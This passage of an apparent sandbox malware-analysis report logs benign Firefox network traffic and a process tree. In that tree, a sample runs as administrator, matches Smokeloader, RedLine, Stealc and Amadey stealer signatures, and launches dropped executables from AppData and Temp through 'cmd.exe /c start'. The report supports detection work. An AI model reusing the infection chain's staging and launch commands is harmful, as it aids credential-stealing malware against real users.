2024-07-26 18:11:05 UTC	1390	IN	Data Raw: d0 30 be 4f 11 22 90 ab 86 d1 af ad 29 56 a2 ba aa af 86 50 4d 3b 8d 6d d7 42 64 61 ad 54 b3 2b 76 a7 94 85 88 ee 6f 66 08 bc af d9 66 3c a5 9a 14 14 38 4b 22 2b d0 51 c8 92 de 5e a6 ea f5 b7 e4 d2 5c d0 af cd f5 13 dc d6 71 4f 1f 3c c3 63 50 ce b9 98 ac 98 ea 7d 4a eb 61 b8 e6 da 78 6e 9e e0 c6 36 c3 38 02 18 dc e6 11 97 e3 50 5a db 9f 67 2b 1a 4a 8d 63 1c 7d 6e d3 06 4d 82 36 f7 19 a3 c7 23 ee 2a f9 1d b6 de a2 94 71 53 5f cf ec 54 c9 1f 80 84 3a 8b 87 25 af 06 28 ee 26 00 01 50 87 75 b2 53 2a 08 c1 79 b2 8d 3d 55 5a 4e 3f 01 de 68 57 ca 2c a1 cf 94 16 b9 72 26 3e 04 cc 5f d7 1f 55 f2 6c 6c 9c 3d 89 fb 17 22 e5 eb 80 66 db cb b8 6e 9f f4 eb db 10 e2 be 18 81 bc d2 ba 3a bb 9c f6 be 94 f3 1f 62 70 1f 92 45 f1 e7 84 51 29 cf c0 08 ae ab 6a 33 00 ff 71 a9 Data Ascii: 0O")VPM;mBdaT+voff<8K"+Q^\qO<cP}Jaxn68PZg+Jc}nM6#qS_T:%(&PuSy=UZN?hW,r&>_Ull="fn:bpEQ)j3q
2024-07-26 18:11:05 UTC	115	IN	Data Raw: 3c 00 bc 78 00 78 f1 00 f0 e2 01 e0 c5 03 c0 8b 07 80 17 0f 00 2f 1e 00 5e 3c 00 bc 78 00 78 f1 00 f0 e2 01 e0 c5 03 c0 8b 07 80 17 0f 00 2f 1e 00 5e 3c 00 bc 78 00 78 f1 00 f0 e2 01 e0 c5 03 c0 8b 07 80 17 0f 00 2f 1e 00 5e 3c 00 bc 78 00 78 f1 00 f0 e2 01 e0 e5 7f 44 fe 53 80 01 00 fe da e8 ec 1f 34 19 68 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: <xx/^<xx/^<xx/^<xxDS4hIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.5	64290	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 933 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.5	64294	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/d31608f2-3b9f-449e-ab6f-bfa39d6e5b7e HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840745239213 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 9696 x-goog-hash: crc32c=XVygTQ== x-goog-hash: md5=J1nE6DjzF8VmoUGH+XKk3A== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 9696 X-GUploader-UploadID: AHxI1nPT4kC8-2spEUhUXrcxEsW8NbfdP5Y6CeGa68Er6nPJAj0H4SPEr5PrsI1WURdV9jBSjbMy6nSoLQ Server: UploadServer Date: Wed, 24 Jul 2024 17:30:08 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:45 GMT ETag: "2759c4e838f317c566a14187f972a4dc" Content-Type: application/octet-stream Age: 175257 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 13 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 Data Ascii: PNGIHDRL\tEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 46 39 31 46 31 45 46 46 36 35 44 39 38 36 35 39 32 30 35 30 32 35 41 42 31 35 41 37 43 32 41 30 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 46 39 31 46 31 45 46 46 36 35 44 39 38 36 35 39 32 30 35 30 32 35 41 42 31 35 41 37 43 32 41 30 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e 6f e5 c7 03 00 00 22 63 49 44 41 54 78 da e4 9d e7 5f 14 d9 12 86 47 96 0d 66 04 03 12 c4 55 04 04 51 10 10 f1 9a 36 fe bf fb db cf bb 06 14 03 28 08 2a 08 8a 28 62 d6 55 44 74 f3 7d 66 5e ad 3d 76 9a 9e 9e 1e f0 ee ed 0f e3 38 74 38 a7 c2 5b e1 d4 a9 5e f1 f7 df 7f 67 96 ef Data Ascii: :instanceID="F91F1EFF65D98659205025AB15A7C2A0" stRef:documentID="F91F1EFF65D98659205025AB15A7C2A0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>o"cIDATx_GfUQ6(*(bUDt}f^=v8t8[^g
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: ae ae 4e 70 91 ec 80 be 3b 77 ee ec eb eb 93 49 17 51 ec af 72 54 4a 17 f1 89 e2 02 03 80 e1 f1 e3 c7 05 3d ae 30 08 1a 19 19 99 9d 9d d5 2a 4a 31 2b da 0c 51 2c 94 47 21 4b 90 8c 9d 4c 1b 5f b3 a7 a7 47 62 e8 06 a8 7c 87 37 58 e0 92 2e fc 5a 8e 4f 8b ac c0 03 06 32 be 74 96 c5 07 9f a9 dc 61 19 9e 64 6e b5 ae e2 26 c0 8e c5 71 95 95 95 28 41 41 c1 bd 79 df 9d 9d 9d 1d 1d 1d dc 50 8b 3c 02 1f d7 59 c0 06 94 ba f0 c4 f2 45 b8 76 04 1c e8 01 8c 4f 4d 03 44 17 4c 2e e2 1f 58 94 90 60 b8 ab 56 ad c2 84 68 d0 dc 0d 92 35 36 36 5a 02 27 be 33 de dd dd dd d2 d2 12 21 07 88 3f 9e e2 d2 94 3e 68 18 88 02 28 74 e5 ca 95 98 4a 50 16 3d 49 51 04 21 22 dc d5 a2 8a 15 36 25 0e 23 b9 c3 9a 35 6b a4 49 46 6e 2c c1 d6 ad 5b e3 58 02 ab 0b 82 fa 3b 76 ec 08 8c a5 4d 3b 61 Data Ascii: Np;wIQrTJ=0*J1+Q,G!KL_Gb\|7X.ZO2tadn&q(AAyP<YEvOMDL.X`Vh566Z'3!?>h(tJP=IQ!"6%#5kIFn,[X;vM;a
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: d8 f2 4b ba 34 c0 53 d4 c5 25 a0 28 16 d8 2f a4 16 bb e2 77 06 6e 85 b4 6c 84 9e 85 93 73 f6 ec 59 2d 6c a5 22 f8 ae 62 81 42 f6 c4 72 a3 05 d4 57 51 7f 18 1d e1 1e c3 02 34 fa fa fa 40 06 ee 82 f0 72 95 d6 fc 24 c5 f1 d5 c2 dd 5a 7d f1 e2 45 06 80 5b 22 67 c3 cd b4 f0 05 06 4c 4f 4f 03 c4 e6 71 9b 2b e9 d1 00 31 00 47 ce c4 c8 a8 26 95 05 fa 37 6d da 14 b8 59 43 10 a7 a7 63 2a 81 47 21 7e a1 65 26 71 14 0b 58 d3 4c b3 9a 6d 7f c3 00 e4 bd 1e f6 20 ad d0 9d 2f c0 e8 91 23 47 0e 1f 3e bc 6d db 36 ee 05 1b 12 97 96 a8 e6 9b 01 04 4a 19 a0 87 35 f6 53 21 70 49 40 02 e1 bf 0f fc 43 68 40 ff 88 1d 6a 0a ee 2e 5d ba 84 bd 85 91 52 94 74 97 33 e5 64 03 36 5a 2c cb ba b3 0a 58 d4 9e 21 5a cb 6c e8 44 22 8c 4f 72 44 20 03 0f be fb ee 3b 7c 6a c0 9a 09 14 6a 1e 34 Data Ascii: K4S%(/wnlsY-l"bBrWQ4@r$Z}E["gLOOq+1G&7mYCc*G!~e&qXLm /#G>m6J5S!pI@Ch@j.]Rt3d6Z,X!ZlD"OrD ;\|jj4
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 3e f2 0b f4 c3 06 c0 07 d6 2a 37 c0 23 d0 0f 4e 86 07 fc 17 e3 c1 5f 2d d8 56 50 03 17 f9 ab d0 0c 23 81 4c 70 13 f3 8b 6c f9 c8 38 61 99 22 c2 0b c8 0a b9 25 ef 6a a2 18 08 b9 b6 a2 09 78 12 1b 1a f6 ba 9d 9e f2 8a a0 41 65 36 fd 0c 03 5c 17 2d 31 9c 69 f9 02 20 0a 2c 3b 2c d4 b0 73 1f dc 24 c8 0a 53 71 b4 64 72 55 5d c3 67 67 67 a7 4e 00 58 64 84 15 d4 ec d9 b3 07 1f 57 fc 00 76 30 cb 56 ef 66 19 6c cb 53 41 74 01 0b 87 ba eb aa 14 4e f1 9d 8b 57 81 2b db 7a 1c 17 82 8d 58 20 5d 6b 8e 75 cc 95 7a a4 a7 5c e9 94 e2 1b 59 30 62 d0 ec d2 a5 4b 88 f0 67 b9 83 29 45 4c 23 30 47 e4 26 7f f8 02 0e 40 1d cc c3 f4 f4 34 d0 a4 a0 4f 2b c9 f0 00 bc 82 37 9c 49 c4 80 e5 50 a7 3d 75 0e 19 1b 1b 63 6e 46 50 79 2f 5c b5 3a 77 40 77 24 1d 56 d9 56 59 77 49 40 0a 9d a7 Data Ascii: >*7#N_-VP#Lpl8a"%jxAe6\-1i ,;,s$SqdrU]gggNXdWv0VflSAtNW+zX ]kuz\Y0bKg)EL#0G&@4O+7IP=ucnFPy/\:w@w$VVYwI@
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: ad 69 58 5b 08 77 59 d8 4f 7d db f4 ab 3e ab c0 08 82 ef 62 85 0a 14 11 7f 41 e7 93 27 4f 40 1e b1 93 e0 53 37 af ad ad 45 b7 c4 0f 68 0d 0f 20 7a 67 67 a7 d2 15 86 6c aa 0d 68 68 68 98 99 99 c1 45 e1 71 f6 16 21 4f 61 40 a9 21 08 55 ce 42 10 63 55 99 5c 34 e0 b8 af e5 32 c7 4e 08 c3 7f b9 0f d8 22 df 11 2a f8 5f 8c e4 fa 18 81 5c 94 e0 63 45 91 7d 88 28 f7 cc 3d 0d e8 67 c4 b6 04 86 3d 90 72 98 bf c8 18 00 19 ee a0 d0 89 79 21 e6 dc 13 87 d5 93 a2 10 fe a2 4f 18 73 4c 34 ce 95 1a 22 b9 0e 6b a9 df ae c3 b3 40 85 72 25 ee 99 4f 5e 19 77 f5 54 54 60 56 08 bb 3c 10 3e b5 dd d9 b6 15 c6 dc c0 64 5a 8f 4f 39 3a 3a aa 22 75 83 05 31 06 3f 07 04 17 f8 08 b8 f5 46 9a cc fb 9a 72 f3 02 61 80 88 ae 88 97 a9 21 e6 fc e9 e0 c1 83 fe 5c b7 a4 01 36 e0 ad df bf 7f 1f Data Ascii: iX[wYO}>bA'O@S7Eh zgglhhhEq!Oa@!UBcU\42N"*_\cE}(=g=ry!OsL4"k@r%O^wTT`V<>dZO9::"u1?Fra!\6
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 6a 9f 13 3c 88 08 7a 71 84 b4 28 9d d8 fb 94 63 12 dc b0 49 bc c5 73 c0 25 88 ff 06 8e b4 0e 28 05 f5 5d dd f4 08 ce 8b dc 11 d6 85 4c 4b f3 81 73 c6 72 86 bd e7 c1 bf 44 0e 0f f0 8b f0 1d 02 63 34 55 10 27 0b c7 cc 31 f3 6c c9 2f f3 18 2e 9e 81 e7 60 a1 56 8a 3b 63 03 5d 0b 0d 4b 0d 05 d4 ac 35 cc 76 a9 9d 48 e0 78 34 99 40 1b 20 4c c7 b6 61 42 f3 ae fa c9 cd 07 09 4f 9f 3e ad 3d 68 ae 6d d7 36 5b cf 96 82 82 9c 1f 14 51 9b d7 dc 6e 21 01 7c 6e 6c 6c d4 2e 9f a5 41 9e 4c ee 75 02 88 7f 34 5d 40 86 e8 56 3f 81 c5 4f 9a 39 e0 c6 cc 63 6e 87 d7 0a 39 31 9a ed b9 70 15 11 d7 36 01 65 f4 ca 65 b5 6c f0 08 59 00 03 20 47 60 83 a4 52 90 5e 9a be 77 ef 5e d5 49 84 55 e0 00 2f 11 b9 42 a9 48 20 03 ec 9e 30 20 ce 4b 40 6c 54 dc 4d 6f ca 74 ab 0d 15 0d 24 80 04 78 Data Ascii: j<zq(cIs%(]LKsrDc4U'1l/.`V;c]K5vHx4@ LaBO>=hm6[Qn!\|nll.ALu4]@V?O9cn91p6eelY G`R^w^IU/BH 0 K@lTMot$x
2024-07-26 18:11:05 UTC	654	IN	Data Raw: 34 21 51 b2 b6 b1 b1 51 9b 47 8a bc 7f b1 0c d0 0c eb eb eb 11 84 c1 c1 41 ab 9d 5a 96 fd ff aa 51 94 65 c2 ff d1 4b 63 d2 ba b9 00 56 40 4f 40 ba 6b d7 ae 42 db 04 a7 66 03 02 e3 ac 8a 8a 8a e3 c7 8f ef d8 b1 63 b9 2a 1b cd 06 10 eb e1 fc a8 22 3a c5 91 68 27 1a a0 7f f4 e8 d1 e6 e6 e6 c0 57 c1 26 11 e2 54 64 c4 6d 8c 82 f4 5d b9 72 05 2c 56 71 91 ed 22 5e 9a cd ff 28 e2 d6 ad 5b 61 80 96 10 92 a5 34 3c 33 52 36 4c 75 6d c4 a1 a6 58 a9 70 37 65 ba a8 48 1f 19 c4 2c c3 09 cb 17 2d 8d 83 e4 36 fd 2f 66 1b 85 eb 6b ca d3 47 f0 71 37 40 da 98 2b 13 cb c3 00 4b ee 6b dc 73 73 73 63 63 63 bf fc f2 4b 41 b9 91 b4 74 b1 48 27 c7 82 2c 6d a2 6f 69 69 d1 9e ba d4 85 69 45 29 de 1a 6f e0 4b 68 3a 31 31 a1 de 6d 6e ee c8 4f b2 d4 d3 93 c9 cc ac f1 4f 4d 13 40 b3 d6 Data Ascii: 4!QQGAZQeKcV@O@kBfc*":h'W&Tdm]r,Vq"^([a4<3R6LumXp7eH,-6/fkGq7@+KkssscccKAtH',moiiiE)oKh:11mnOOM@

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.5	64289	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2612 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Target ID:	0
Start time:	14:08:57
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	250'880 bytes
MD5 hash:	45FD30020C12378C242DC90687EDC24C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2443590110.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2443437674.000000000271D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:09:18
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:09:18
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:09:18
Start date:	26/07/2024
Path:	C:\Users\user\AppData\RoamingCBFCFBFBFB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Imagebase:	0x750000
File size:	1'898'496 bytes
MD5 hash:	8EF54B7689AF3A0FE5028BC42964BB26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2237950583.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2283696962.0000000000751000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:09:19
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:09:19
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:09:19
Start date:	26/07/2024
Path:	C:\Users\user\AppData\RoamingIJDGCAEBFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Imagebase:	0xe70000
File size:	1'909'760 bytes
MD5 hash:	2AF5EB9FB318C9A454DE54914E121031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.2307792347.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.2263477354.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:09:20
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xb20000
File size:	1'898'496 bytes
MD5 hash:	8EF54B7689AF3A0FE5028BC42964BB26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.2270021811.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2310315083.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:09:21
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xb20000
File size:	1'898'496 bytes
MD5 hash:	8EF54B7689AF3A0FE5028BC42964BB26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.2269241540.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2309993575.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:09:22
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 2368
Imagebase:	0xf20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:09:24
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x660000
File size:	1'909'760 bytes
MD5 hash:	2AF5EB9FB318C9A454DE54914E121031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000003.2298393028.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.2338863000.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:09:24
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Imagebase:	0x660000
File size:	1'909'760 bytes
MD5 hash:	2AF5EB9FB318C9A454DE54914E121031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
